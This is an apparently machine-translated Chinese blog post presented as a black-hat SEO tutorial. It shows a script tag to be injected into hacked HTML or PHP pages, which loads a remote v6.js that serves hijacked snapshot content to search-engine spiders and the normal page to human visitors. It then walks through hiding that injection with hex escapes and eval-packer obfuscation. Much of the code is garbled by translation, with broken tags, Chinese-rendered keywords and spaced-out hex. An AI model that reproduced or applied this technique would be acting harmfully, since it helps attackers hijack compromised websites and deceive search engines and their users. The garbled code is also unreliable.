html的seo功能(seo中html优化)

还有一些黑帽SEO加密跳转js代码,学习JavaScript加密方法。当我们的网站被黑的时候,我们就会知道这个代码是快照劫持的代码,删除它就可以解决网站被黑的问题。今天,错误博客(cuowu.com)分享的内容是《黑帽SEO教程为html中的js跳转url加密》。希望对大家有帮助。

黑帽SEO教程为html中的js跳转url加密
黑帽SEO教程为html中的js跳转url加密

JavaScript跳转是黑帽SEO中常见的快照劫持操作方式。例如,在寄生虫程序的使用中,可以将以下代码添加到被黑客攻击的html或php中,完成快照劫持:

script type=" text/JavaScript " src=http://www . toutiao.com/a 6990361391894938144/" http://cuowu.com/V6 . js "/script

这段JavaScript代码的作用是导入v6.js文件,其中的内容是if判断语句。如果你访问百度蜘蛛、360蜘蛛、搜狗蜘蛛等。会显示被劫持的快照内容,如果直接访问浏览器,会显示原页面内容。

首先,添加上述命令,如下所示:

window[" document "][" write "](' scritp type=" text/JavaScript " SCR=" https://cuowu.com/V6 . js " ')/script;

然后,前面双引号中的内容以十六进制加密,后面单引号中的内容也以十六进制加密,如下所示:

\ x64 \ x6f \ x63 \ x75 \ x6d \ x65 \ x6e \ x74

\x77\x72\x69\x74\x65

\ x73 \ x63 \ x72 \ x69 \ x74 \ X70 \ x20 \ x74 \ x79 \ X70 \ x65 \ X3D \ x22 \ x74 \ x65 \ x78 \ x74 \ x2f \ x6a \ x61 \ x76 \ x61 \ x73 \ x72 \ x69 \ X70 \ x74 \ x22 \ x20 \ x73 \ x63 \ x72 \ X3D \ x22 \ x68 \ x74 \ x74 \ X70 \ x73 \ x3a \ x2f

黑帽SEO教程为html中的js跳转url加密
黑帽SEO教程为html中的js跳转url加密

这个在线工具可以用utf-8加密成十六进制。错误。网站管理员的导航包含。

网站管理员(https://cuowu.com/daohang/)

加密后,它变成:

window[" \ x64 \ x66 \ x63 \ x75 \ x6d \ x65 \ x6e \ x74 "][" \ x77 \ x72 \ x69 \ x74 \ x65 "](' \ x73 \ x63 \ x72 \ x69 \ x74 \ X70 \ x20 \ x74 \ x79 \ X70 \ x65 \ X3D \ x22 \ x74 \ x65 \ x78 \ x74 \ x2f \ x6a \ x61 \ x76 \ x61 \ x73 \ x63 \ x72 \ x72

然后,上面的js代码可以再补充一遍才能正常运行,即:

脚本类型="文本/javascript "

window[" \ x64 \ x66 \ x63 \ x75 \ x6d \ x65 \ x6e \ x74 "][" \ x77 \ x72 \ x69 \ x74 \ x65 "](' \ x73 \ x63 \ x72 \ x69 \ x74 \ X70 \ x20 \ x74 \ x79 \ X70 \ x65 \ X3D \ x22 \ x74 \ x65 \ x78 \ x74 \ x2f \ x6a \ x61 \ x76 \ x61 \ x73 \ x63 \ x72 \ x72

/脚本

将中间窗口设置为/script;内容可以用站长工具的JS混淆加密压缩以eval形式加密,站长导航有一些错误。

网站管理员(https://cuowu.com/daohang/)

黑帽SEO教程为html中的js跳转url加密
黑帽SEO教程为html中的js跳转url加密

获取以下加密代码,如下所示:

eval(function(p,a,c,k,e,d){e=function(c){return(ca?" " : e(parse int(c/a))((c=c % a)35?string . from charcode(c 29): c . tostring(36))};如果(!".replace(/^/,string)){while(c)d[e(c)]=k[c]||e(c);k=[函数(e){ return d[e]}];e=function(){ return ' \ \ w ' };c=1;};while(c-)if(k[c])p=p . replace(new RegExp(' \ \ b ' e(c)' \ \ b ',' g '),k[c]);返回p;}(' k[" \ \ m \ \ a \ \ 1 \ \ 9 \ \ g \ \ 5 \ \ l \ \ 0 "][" \ \ b \ \ 4 \ \ 7 \ \ 0 \ \ 5 "](\ ' \ \ 2 \ \ 1 \ \ 4 \ \ 7 \ \ 0 \ \ 6 \ \ e \ \ 0 \ \ j \ \ 6 \ \ 5 \ \ c \ \ 8 \ \ 0 \ \ 5 \ \ q \ \ 0 \ \ 3 \ \ I \ \ d \ \ h \ \ d \ \ 2 \ \ 1 \ \ 4 \ \ 7 \ \ 6 \ \ 0 \ \ 8 \ \ e \ \ 2 \ \ 1 \ \ 4 \ \ c \ \ 8 \ \ r \ \ 0 \ \ 0 \ \ 6 \ \ 2 \ \ n,28,28,' x74 | x63 | x73 | x2f | x72 | x65 | X70 | x69 | x22 | x75 | x6f | x77 | X3D | x61 | x20 | x2e | x6d | x76 | x6a | x79 | window | x6e | x64 | x3a | x36 | script | x78 | x68 '。split('| '),0,{}))

最终的加密代码如下:

脚本类型="文本/javascript "

eval(function(p,a,c,k,e,d){e=function(c){return(ca?" " : e(parse int(c/a))((c=c % a)35?字符串。from charcode(c 29): c . tostring(36))};如果(!".replace(/^/,string)){while(c)d[e(c)]=k[c]||e(c);k=[函数{ return d[e]}];e=function(){ return ' \ \ w ' };c=1;};while(c-)if(k[c])p=p . replace(new RegExp(' \ \ b ' e(c)' \ \ b ',' g '),k[c]);返回p;}(' k[" \ \ m \ \ a \ \ 1 \ \ 9 \ \ g \ \ 5 \ \ l \ \ 0 "][" \ \ b \ \ 4 \ \ 7 \ \ 0 \ \ 5 "](\ ' \ \ 2 \ \ 1 \ \ 4 \ \ 7 \ \ 0 \ \ 6 \ \ e \ \ 0 \ \ j \ \ 6 \ \ 5 \ \ c \ \ 8 \ \ 0 \ \ 5 \ \ q \ \ 0 \ \ 3 \ \ I \ \ d \ \ h \ \ d \ \ 2 \ \ 1 \ \ 4 \ \ 7 \ \ 6 \ \ 0 \ \ 8 \ \ e \ \ 2 \ \ 1 \ \ 4 \ \ c \ \ 8 \ \ r \ \ 0 \ \ 0 \ \ 6 \ \ 2 \ \ n,28,28,' x74 | x63 | x73 | x2f | x72 | x65 | X70 | x69 | x22 | x75 | x6f | x77 | X3D | x61 | x20 | x2e | x6d | x76 | x6a | x79 | window | x6e | x64 | x3a | x36 | script | x78 | x68 ' . split('| '),0,{}))

/脚本

这就是全部的射流研究…加密压缩过程了,解压过程反过来推就可以了。

以上就是错误博客(https://cuowu.com/)分享的内容为《黑帽SEO为html中的js加密(js混淆与16进制加密)》 。感谢您的阅读。更多原创搜索"错误博客"。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/177714.html

(0)

相关推荐